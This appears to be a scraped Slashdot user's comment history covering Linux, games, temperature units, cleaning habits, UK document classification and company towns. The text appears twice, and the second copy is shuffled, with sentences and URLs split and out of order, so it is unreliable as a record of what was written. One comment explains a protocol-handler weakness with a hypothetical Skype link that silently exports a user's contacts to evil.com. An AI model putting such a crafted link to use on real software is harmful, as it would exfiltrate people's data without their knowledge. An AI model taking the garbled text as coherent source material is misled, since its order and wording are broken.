And also how the hell does it know how much to delay?
Okay, so it might be able to work out cable length based on resistance or something and delay based on that, but cable length doesn't equate to distance from listener so it'd be a useless measure and would actually crap things up in some situations.
Well this is the newer version, so I'm sure the interface has been improved and brought up to date. It may even perform better and look better without requiring all of the hardware updates of the new Vis[t]a credit cards.
As for third party money clips, they are available but some of them are still in beta and were forked because someone decided it should fit twenty notes instead of fifteen.
Rest assured that even if you do have problems after the change then there'll be a kind and helpful community that will work with you to help you resolve your problem, instead of having some generic helpdesk, an extortionate phone number or a complete lack of support.
I really do not use credit cards, but if I did this one wouldn't be a bad choice.
I only use them for online purchases as an additional layer of protection. One of the main purchase is hosting. I could buy my Linux hosting on a Linux card:)
As for the GP, I like how their non-religious people get black hoods and robes and basically turn into cultists:D It's interesting to note how religious trolls relate a lack of religion to a lack of morals. Just because morals are defined by religions doesn't mean that a lack of religion has a lack of morals. It just means it has morals decided by society instead of by some supposed supreme being.
Okay, so it's only EA and so not necessarily the best games, but now that a big dev house is starting to consider Mac OS X as a gaming platform, will they consider Linux as well? Given that they've got a similar *nix base then it shouldn't be too far a leap.
And yes, I know there's Wine and Cedega (which ran worse on my machine than Wine with Dawn of War) but something officially supported would be good. Even if it's just on a few main distros.
*reads Wikipedia* Turns out someone lied to me and it's 273.15 for Kelvins (or else someone improved it at some point). That still leaves Kelvins as SI and Rankines apparently predominantly US only.
But "Global Climate Change" doesn't pack such a punch on headlines. Something like "Global Climate Chaos" or "Global Climate Uncertainty" would have a good PR image, as would "Global Climate Flooding" (especially for those people like me in Three Counties who have recently been flooded out).
"Global Climate Change" has about as much punch to most people as "Global Climate Variation" or "Slight Disturbance in Global Weather".
Who needs real science when you've got a punchy name that evokes emotions and provides a lasting impression?;)
Hydrochloric acid? It'd certainly make sure that there was no residue on your hands and that they couldn't trace finger prints (if they weren't already on record);)
Anti-bacterial on everything in the house definitely seems to be a bad thing.
I had a friend at primary and secondary school, and his mum used to frequently wipe everything down with Dettol (don't know if it's a US brand as well). My mum wiped the surfaces down with a dish cloth, and occasionally used bleach or something when there was a particularly bad patch. He was ill way more than I ever was.
Okay, so it isn't conclusive, but given that they give inoculations for things then it can't be all that bad to actually expose yourself to some germs and bacteria and not just kill all of them, thereby leaving yourself more immune when you find a larger pocket.
It doesn't seem to need to be remotely installable. Reading the article (!) mentions that there's a developer's piece of software that's apparently vulnerable to sending out data via this method. That means it can be any badly designed software like AIM or Skype or anything else that could potentially legitimately register itself as a protocol handler that could be the target of this.
Granted, that means that exploits using it wouldn't work on people without that specific app installed or with the protocol handling removed, but then isn't it the same with spam and current exploits? Sending the spam/virus to everyone or probing as many computers as possible doesn't rely on it working for everyone, just on it working for some people and that those "some people" are sufficiently numerous.
IMO, only when it leads to unexpected behaviour. In this situation it might be expected behaviour, but behaviour that shouldn't sensibly have been made public. That makes it a security issue and a bad design decision, but not necessarily a bug (under my interpretation of 'bug' in software)
I was talking to a work-mate after posting that and he said a similar thing - it depends what you class as a bug, it could be a security bug.
IMO it wouldn't be a bug. To me a bug is something that shouldn't be happening, full stop. e.g. ability to inject data (as you can with a bad PHP script, register global variables and a specially constructed query string), ability to corrupt data or cause crashes (as you can do with a buffer overflow) or ability to bypass a security measure through some simple means (like my college's web filtering software that let you get to blockedexample.com by going to something like http://example.com/).
This, on the other hand, is just lax security or bad separation in design. It might be functionality that you want on the whole and hence a feature (as in my example) but to me registering the whole EXE is a bad choice, not checking the input when invoked in that way (if it's possible) is a bad choice, allowing the data sending without confirmations was potentially a bad choice, and so on.
Having said all that then I would still expect it to turn up in a bug tracking app;) But phpBB have a separate "security bug tracker".
Only it's not that the application may have a bug, but that it may have an intentional feature that is useful for users that can then be exploited through a link. It might have less security than it should, but that's poor planning and not a bug.
Take someone's earlier example of Skype. Lets assume you can do "skype --export-contacts --dest/some/path/here". Nice and useful for when you're migrating settings on your own desktop. Now assume that Skype also lets you export to your website so that you can publish it to your site, so you can put a HTTP in there. Now assume that users have complained about popups prompting them and that they want a batch mode that lets them export each night to make sure they never lose data - so it doesn't prompt.
You'd now have something like "skype --export-contacts --dest http://www.example.com/mybackupscript --batch-mode". It does exactly what you want, you can archive your contacts, and you can event do it overnight to a remote location so it's accessible to you from anywhere and won't be lost in a disk crash. Only someone didn't secure it very well (again, bad implementation, not a bug) and someone somehow gets you to click on a link saying "skype:export-contacts&dest=http://www.evil.com/my backupscript&batch-mode". That 'feature' is now being exploited to export your contacts to an arbitrary site without you even necessarily knowing.
I'm sure there are lots of other similar alternatives, but the whole point is that it's badly validated input and not a bug. It's fairly sensible to have "skype:call-userid" as a link so that you can run up Skype and call someone. What it's not sensible to do is let that URI call do anything that can be done locally.
Just a related thing I thought of as I posted: Government and Government Associates hate companies who insist on "Private and Confidential" in documents and are unwilling to change to "Private and in confidence". One of the many joys of having Confidential as an important security keyword and having email monitors that check for sensitive keywords to stop accidental release!
Maybe the UK works differently (or maybe it's because of transfer of classification based on content) but I work at a List X company and people within the company get to determine whether documents are Restricted or whatever (we use UC, R, S and TS in the UK - there is Confidential, but it's generally replaced with S). They can also extracted parts of a report and release them at a lower classification (since I spend most of my day working on an Unclass machine).
I'm assuming there must be some controls somewhere to stop incorrect downgrading etc, and it probably won't apply to business data (which gets marked "[company name] proprietary") but that's how it seems to work from my year here so far.
Pah, they're not company towns. Port Sunlight in the UK was a company town (built by Lord Leverhulme for the workers at the Lever Brothers soap factory). Being 1880s, I think it beats most American attempts at company towns (although I've never seen the shops in it, but then I've mainly been to the Lady Lever Art Gallery):)
The only problem with mills (especially cotton mills) was that while it beat "maybe starving to death" it did add "possibly getting trapped and either killed or losing a limb". Especially if you were one of the young children who were young enough to get between the machines (while they were still running) and clear up the bits of cotton that could otherwise clog the machine.
If anyone lives in the UK then Quarry Bank Mill is a good place to go - they even still run one of the machines at times so you get get the starts of an impression of how deaf they must have ended up by the end of the day!
Yes, but GUIs also normally have applications to enable and disable services (which was my point). Their method is to hack in files from the command line or similar, while most distros should have an "easy to use" service management app. I know Redhat and Fedora have for ages.
How To in summary...
on
Hardening Linux
·
· Score: 5, Informative
For those not wanting to read the article, that "basic how to" is:
1) Disable unwanted services (done via the CLI in this day of GUIs) 2) Keep the OS patched 3) Install and run Bastille to do everything else for you.
I don't know, for a development company then I wouldn't be too happy if the only good points people could find were non-development related. It just seems like he's complimenting their marketing while also slyly (and presumably intentionally) not applauding their development. It's one of those "not what he says, but what he doesn't say" things.
As for being user friendly, yes, they have managed that. IMO they've also done well with C# and.Net, especially since it was opened up and Mono and many other related implementations and languages now use the framework.
Whether or not it's for the best that the "computer-challenged sods" can get online is another matter;) Yes, I wouldn't have been computer savvy at one point, but having a certain level of desire and intent required at first would have stopped many things like botnets becoming such an issue:)
Sun Tzu was right though, you can either wean yourself off the enemy and create your own destiny, or you can destroy Darth Vader and take his place at the Emperor's side.
Wow, not only was Sun Tzu a master tactician (or at least the author of the tactical text of his era) but he was also a psychic who could see in to at least the 1970s and predict the existence of someone called "Darth Vader" who was evil and had a place at the Emperor's side! That guy doesn't have enough respect.
"There are some things that Windows does pretty well," Zemlin said. Microsoft for instance has excelled in marketing the operating system, and has a good track record in fending off competition.
So what he's saying is that Linux excels at being good software, while Microsoft only excel at marketing practices? Sounds like a double-edged compliment to Microsoft to me!
Slashdot Mirror
And also how the hell does it know how much to delay?
Okay, so it might be able to work out cable length based on resistance or something and delay based on that, but cable length doesn't equate to distance from listener so it'd be a useless measure and would actually crap things up in some situations.
Well this is the newer version, so I'm sure the interface has been improved and brought up to date. It may even perform better and look better without requiring all of the hardware updates of the new Vis[t]a credit cards.
As for third party money clips, they are available but some of them are still in beta and were forked because someone decided it should fit twenty notes instead of fifteen.
Rest assured that even if you do have problems after the change then there'll be a kind and helpful community that will work with you to help you resolve your problem, instead of having some generic helpdesk, an extortionate phone number or a complete lack of support.
I only use them for online purchases as an additional layer of protection. One of the main purchase is hosting. I could buy my Linux hosting on a Linux card
As for the GP, I like how their non-religious people get black hoods and robes and basically turn into cultists
Okay, so it's only EA and so not necessarily the best games, but now that a big dev house is starting to consider Mac OS X as a gaming platform, will they consider Linux as well? Given that they've got a similar *nix base then it shouldn't be too far a leap.
And yes, I know there's Wine and Cedega (which ran worse on my machine than Wine with Dawn of War) but something officially supported would be good. Even if it's just on a few main distros.
That assumes that people want terms that match the facts, though, rather than terms that sound good and get the interest of the papers ;)
My new point is that you didn't read my follow up where I found I'd been lied to ;)
Half of the original point is that Rankine's aren't 'normal' scientific units as they're not SI units.
*reads Wikipedia* Turns out someone lied to me and it's 273.15 for Kelvins (or else someone improved it at some point). That still leaves Kelvins as SI and Rankines apparently predominantly US only.
With a base of -459.67 F = 0 R? At least Kelvins have a nice round number as a starting point (even if it is 273).
;)
More importantly, Kelvins are SI but Rankines (which I'd never heard being used in the UK) are apparently not. It's all about standards
But "Global Climate Change" doesn't pack such a punch on headlines. Something like "Global Climate Chaos" or "Global Climate Uncertainty" would have a good PR image, as would "Global Climate Flooding" (especially for those people like me in Three Counties who have recently been flooded out).
;)
"Global Climate Change" has about as much punch to most people as "Global Climate Variation" or "Slight Disturbance in Global Weather".
Who needs real science when you've got a punchy name that evokes emotions and provides a lasting impression?
Because 0.001 C instead of 0.0005 C (approx 0.001 F) makes a major difference to the correction ;)
TBH, I'd hope they'd be using Celsius as they map directly to Kelvins, but with the Americans and their Fahrenheit then you never know.
Hydrochloric acid? It'd certainly make sure that there was no residue on your hands and that they couldn't trace finger prints (if they weren't already on record) ;)
Anti-bacterial on everything in the house definitely seems to be a bad thing.
I had a friend at primary and secondary school, and his mum used to frequently wipe everything down with Dettol (don't know if it's a US brand as well). My mum wiped the surfaces down with a dish cloth, and occasionally used bleach or something when there was a particularly bad patch. He was ill way more than I ever was.
Okay, so it isn't conclusive, but given that they give inoculations for things then it can't be all that bad to actually expose yourself to some germs and bacteria and not just kill all of them, thereby leaving yourself more immune when you find a larger pocket.
It doesn't seem to need to be remotely installable. Reading the article (!) mentions that there's a developer's piece of software that's apparently vulnerable to sending out data via this method. That means it can be any badly designed software like AIM or Skype or anything else that could potentially legitimately register itself as a protocol handler that could be the target of this.
Granted, that means that exploits using it wouldn't work on people without that specific app installed or with the protocol handling removed, but then isn't it the same with spam and current exploits? Sending the spam/virus to everyone or probing as many computers as possible doesn't rely on it working for everyone, just on it working for some people and that those "some people" are sufficiently numerous.
IMO, only when it leads to unexpected behaviour. In this situation it might be expected behaviour, but behaviour that shouldn't sensibly have been made public. That makes it a security issue and a bad design decision, but not necessarily a bug (under my interpretation of 'bug' in software)
e shold=-1&commentsort=0&mode=thread&pid=20248365#20 248719 for my longer response.
See http://it.slashdot.org/comments.pl?sid=271163&thr
I was talking to a work-mate after posting that and he said a similar thing - it depends what you class as a bug, it could be a security bug.
;) But phpBB have a separate "security bug tracker".
IMO it wouldn't be a bug. To me a bug is something that shouldn't be happening, full stop. e.g. ability to inject data (as you can with a bad PHP script, register global variables and a specially constructed query string), ability to corrupt data or cause crashes (as you can do with a buffer overflow) or ability to bypass a security measure through some simple means (like my college's web filtering software that let you get to blockedexample.com by going to something like http://example.com/).
This, on the other hand, is just lax security or bad separation in design. It might be functionality that you want on the whole and hence a feature (as in my example) but to me registering the whole EXE is a bad choice, not checking the input when invoked in that way (if it's possible) is a bad choice, allowing the data sending without confirmations was potentially a bad choice, and so on.
Having said all that then I would still expect it to turn up in a bug tracking app
Only it's not that the application may have a bug, but that it may have an intentional feature that is useful for users that can then be exploited through a link. It might have less security than it should, but that's poor planning and not a bug.
/some/path/here". Nice and useful for when you're migrating settings on your own desktop. Now assume that Skype also lets you export to your website so that you can publish it to your site, so you can put a HTTP in there. Now assume that users have complained about popups prompting them and that they want a batch mode that lets them export each night to make sure they never lose data - so it doesn't prompt.
y backupscript&batch-mode". That 'feature' is now being exploited to export your contacts to an arbitrary site without you even necessarily knowing.
Take someone's earlier example of Skype. Lets assume you can do "skype --export-contacts --dest
You'd now have something like "skype --export-contacts --dest http://www.example.com/mybackupscript --batch-mode". It does exactly what you want, you can archive your contacts, and you can event do it overnight to a remote location so it's accessible to you from anywhere and won't be lost in a disk crash. Only someone didn't secure it very well (again, bad implementation, not a bug) and someone somehow gets you to click on a link saying "skype:export-contacts&dest=http://www.evil.com/m
I'm sure there are lots of other similar alternatives, but the whole point is that it's badly validated input and not a bug. It's fairly sensible to have "skype:call-userid" as a link so that you can run up Skype and call someone. What it's not sensible to do is let that URI call do anything that can be done locally.
Just a related thing I thought of as I posted: Government and Government Associates hate companies who insist on "Private and Confidential" in documents and are unwilling to change to "Private and in confidence". One of the many joys of having Confidential as an important security keyword and having email monitors that check for sensitive keywords to stop accidental release!
Maybe the UK works differently (or maybe it's because of transfer of classification based on content) but I work at a List X company and people within the company get to determine whether documents are Restricted or whatever (we use UC, R, S and TS in the UK - there is Confidential, but it's generally replaced with S). They can also extracted parts of a report and release them at a lower classification (since I spend most of my day working on an Unclass machine).
I'm assuming there must be some controls somewhere to stop incorrect downgrading etc, and it probably won't apply to business data (which gets marked "[company name] proprietary") but that's how it seems to work from my year here so far.
Pah, they're not company towns. Port Sunlight in the UK was a company town (built by Lord Leverhulme for the workers at the Lever Brothers soap factory). Being 1880s, I think it beats most American attempts at company towns (although I've never seen the shops in it, but then I've mainly been to the Lady Lever Art Gallery) :)
The only problem with mills (especially cotton mills) was that while it beat "maybe starving to death" it did add "possibly getting trapped and either killed or losing a limb". Especially if you were one of the young children who were young enough to get between the machines (while they were still running) and clear up the bits of cotton that could otherwise clog the machine.
If anyone lives in the UK then Quarry Bank Mill is a good place to go - they even still run one of the machines at times so you get get the starts of an impression of how deaf they must have ended up by the end of the day!
Yes, but GUIs also normally have applications to enable and disable services (which was my point). Their method is to hack in files from the command line or similar, while most distros should have an "easy to use" service management app. I know Redhat and Fedora have for ages.
For those not wanting to read the article, that "basic how to" is:
1) Disable unwanted services (done via the CLI in this day of GUIs)
2) Keep the OS patched
3) Install and run Bastille to do everything else for you.
I don't know, for a development company then I wouldn't be too happy if the only good points people could find were non-development related. It just seems like he's complimenting their marketing while also slyly (and presumably intentionally) not applauding their development. It's one of those "not what he says, but what he doesn't say" things.
.Net, especially since it was opened up and Mono and many other related implementations and languages now use the framework.
;) Yes, I wouldn't have been computer savvy at one point, but having a certain level of desire and intent required at first would have stopped many things like botnets becoming such an issue :)
As for being user friendly, yes, they have managed that. IMO they've also done well with C# and
Whether or not it's for the best that the "computer-challenged sods" can get online is another matter
Wow, not only was Sun Tzu a master tactician (or at least the author of the tactical text of his era) but he was also a psychic who could see in to at least the 1970s and predict the existence of someone called "Darth Vader" who was evil and had a place at the Emperor's side! That guy doesn't have enough respect.
So what he's saying is that Linux excels at being good software, while Microsoft only excel at marketing practices? Sounds like a double-edged compliment to Microsoft to me!